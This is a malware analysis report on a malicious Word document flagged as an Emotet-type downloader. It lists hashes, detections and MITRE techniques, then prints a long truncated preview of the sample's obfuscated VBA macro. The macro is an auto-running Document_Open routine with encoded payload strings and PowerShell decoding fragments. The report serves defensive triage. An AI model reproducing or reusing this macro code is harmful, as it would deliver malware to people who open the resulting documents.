Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fd79de4082ddd585…

MALICIOUS

Office (OLE)

Size: 145.5 KB
Created: 2018-04-18 19:11:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 38256f1877e291236a7c01ecceec7786
SHA-1: 024e3fcdcacb942f9bb01311c4383fdb022d89d9
SHA-256: fd79de4082ddd5855e8589bf379265cd31c83375bcce845eeae720d1f126f210
Risk score: 184

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic; T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro that calls the Shell() function, indicating an attempt to execute arbitrary code. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' further supports its malicious nature. The VBA script appears to be obfuscated, but its structure suggests it is designed to download and execute a second-stage payload, likely from a URL constructed within the script.

Heuristics (6)

  • ClamAV: Doc.Malware.Emodldr-10025032-0 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected (severity: medium; 2 related findings; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (severity: critical; rule: OLE_VBA_SHELL)
    Shell() call in VBA
  • Document_Open macro (severity: high; rule: OLE_VBA_DOCOPEN)
    Document_Open macro
  • Suspicious extracted artifact (severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 43727 bytes
SHA-256: 3c73c0b3d7758bc846f310f7d57b83eeaf43fcfc6352ebacc5ef93d22e079f39
Detection: ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 18 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ZkHpbFWQzZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
mwSIj _
= ChrB(88236 / Log(36580) / 66119 _
+ 42204)
jZuuwd = 65557 _
/ CBool(uKoSK) / 74 + CSng(XVvtw) - _
(MVhAU * HbYvIW)
Application.Run jOAIz + "KVMEBNR" + UiUEb, UmJkNw + EXLoFEuzA + jNUOr
ZVVGww _
= ChrB(4487 / Log(33402) / 33170 _
+ 52068)
XMzidZ = 83753 _
/ CBool(FXAqz) / 74 + CSng(KwjmnP) - _
(IOXtw * VFZLCK)
End Sub


Attribute VB_Name = "NBBvFndzl"
Sub ZfYOo(TidLu)
zZkfz _
= ChrB(41465 / Log(22489) / 62112 _
+ 22679)
fjdJvn = 63189 _
/ CBool(mCWsw) / 74 + CSng(aNhDG) - _
(ZzTzDb * aqHlF)
End Sub
Function EXLoFEuzA()
On Error Resume Next
qpdfI _
= ChrB(95341 / Log(24541) / 82769 _
+ 32718)
JRPci = 15903 _
/ CBool(jQVoBH) / 74 + CSng(QWdaC) - _
(XTBvfc * loINb)
zPaOXQMXokc = fXKatE("DfAA5ADUAMwAwADUAMQBhADMANgBjADEAMwA3AGUAZABkADQAZABjAGMAZQA2AGUANgBjAGMAMgA3ADcAYQAzADQAMgAzADgAZAA0ADgAYQA3ADkAZgAxA8Ss@", nNCNR - nNCNR + 3 + nNCNR - nNCNR, nNCNR - nNCNR + 116 + nNCNR - nNCNR)
fmtjEj _
= ChrB(76723 / Log(80966) / 15975 _
+ 89496)
QoiOO = 72032 _
/ CBool(momvp) / 74 + CSng(TzCrw) - _
(HHMPcc * qZtOo)
KNFzSc _
= ChrB(56778 / Log(14791) / 4426 _
+ 58037)
bNpTYt = 70080 _
/ CBool(zNLoA) / 74 + CSng(ESrKah) - _
(bwGaL * pRFFAZ)
VBwOwEAS = fXKatE("h0w8GIANQBmMzYR4", Zuiqu - Zuiqu + 5 + Zuiqu - Zuiqu, Zuiqu - Zuiqu + 7 + Zuiqu - Zuiqu)
fKKDj _
= ChrB(50714 / Log(70274) / 88603 _
+ 42197)
zYFJN = 17968 _
/ CBool(wbzKzQ) / 74 + CSng(sMLuHr) - _
(KPzIt * obAwZ)
WBZTU _
= ChrB(38168 / Log(33541) / 78845 _
+ 88360)
RNJwGQ = 18721 _
/ CBool(BNmLwq) / 74 + CSng(hJnKjA) - _
(ONWzz * nCVJhI)
izuwhn = fXKatE("aY6MANABhAGEANgA2ADUAMwBjADUANQAzADEAYwA0ADQAOAA5ADkAOQAwADYAZQA1ADYAMwA1AGMAZgAyADkANQA5ADkANgA1ADgANwA1ADYANwA0ADEAMgBlADgAZAA4ADEsww7", jGBGY - jGBGY + 4 + jGBGY - jGBGY, jGBGY - jGBGY + 129 + jGBGY - jGBGY)
vpVKL _
= ChrB(25865 / Log(88887) / 10236 _
+ 92211)
KDicm = 20232 _
/ CBool(iKwwzw) / 74 + CSng(JSUFws) - _
(iqVurn * zWGPSw)
ZLaXS _
= ChrB(85408 / Log(70798) / 67317 _
+ 3808)
zkLwXN = 10298 _
/ CBool(EQsRqj) / 74 + CSng(LPFzl) - _
(IsRaXr * zBsBn)
pQzcW = fXKatE("Us0QA5ADAAZQA2ADAANABjADQAMQAzADgAYwA2AGUAYQA5AGMANgA0ADkAYQBmADYAZgAwADgANQBlAGIAZAAvFs%", tONAs - tONAs + 4 + tONAs - tONAs, tONAs - tONAs + 82 + tONAs - tONAs)
lQrtB _
= ChrB(37914 / Log(21178) / 2189 _
+ 86954)
jIUuP = 12961 _
/ CBool(fjQirs) / 74 + CSng(XAVlkC) - _
(qdfur * WDjav)
WozEO _
= ChrB(7505 / Log(48655) / 40053 _
+ 81916)
DXPRj = 53829 _
/ CBool(oJXJbE) / 74 + CSng(IlmwJG) - _
(KJdRZ * cqPMup)
MDDBL = fXKatE("8DZIAMgBmADkAYwBjADQANQBiAGEAYQBlADMAYwA5ADcAMAAxADUAMAA0AGEAZgA5ADUAZgBmAE88", fkSCw - fkSCw + 5 + fkSCw - fkSCw, fkSCw - fkSCw + 70 + fkSCw - fkSCw)
OmXzUw _
= ChrB(88047 / Log(65756) / 6495 _
+ 16752)
vkRvd = 33882 _
/ CBool(LjztOl) / 74 + CSng(JiXwu) - _
(OmMUW * odMMZ)
iEjinM _
= ChrB(76345 / Log(33772) / 6453 _
+ 26383)
obkvzz = 29648 _
/ CBool(FZdZLr) / 74 + CSng(dPmNlj) - _
(jJjBn * ziAmHv)
DGNjDUp = fXKatE("@PmL]::PTRTOStRinGBstR( [rUntiMe.InTeRopSErViCes.MaRShal]::seCuresTringToBsTr( $('76492d1116743f0423413b16050a5345MgB8AEgAegA5AEUAbwBRAEgAaYLap", AVVpj - AVVpj + 4 + AVVpj - AVVpj, AVVpj - AVVpj + 136 + AVVpj - AVVpj)
loRbG _
= ChrB(66713 / Log(73093) / 66189 _
+ 23017)
fUqBi = 47144 _
/ CBool(pcDfrb) / 74 + CSng(wKTrX) - _
(qRQiA * zKHCua)
SfoXlJ _
= ChrB(77763 / Log(68964) / 41370 _
+ 53329)
ZdIfDj = 61928 _
/ CBool(dijHUi) / 74 + CSng(iSAjLv) - _
(BCCLqU * lpYLW)
lmCdws = fXKatE("4zAwADYAZABkADQAZgAwAGEAOQAyADUAZABhADMANwAyADEAZABkADgAYgA2ADYAMQAxADUAYgBlADMAMQA3AGYANwAwADIa3QahVM", IAjwv - IAjwv + 3 + IAjwv - IAjwv, IAjwv - IAjwv + 93 + IAjwv - IAjwv)
OJSjk _
= ChrB(90504 / Log(81536) / 50477 _
+ 20051)
YTspbV = 67384 _
/ CBool(PtobGc) / 74 + CSng(qLQstI) - _
(wWhYAU * QFKrQi)
... (truncated)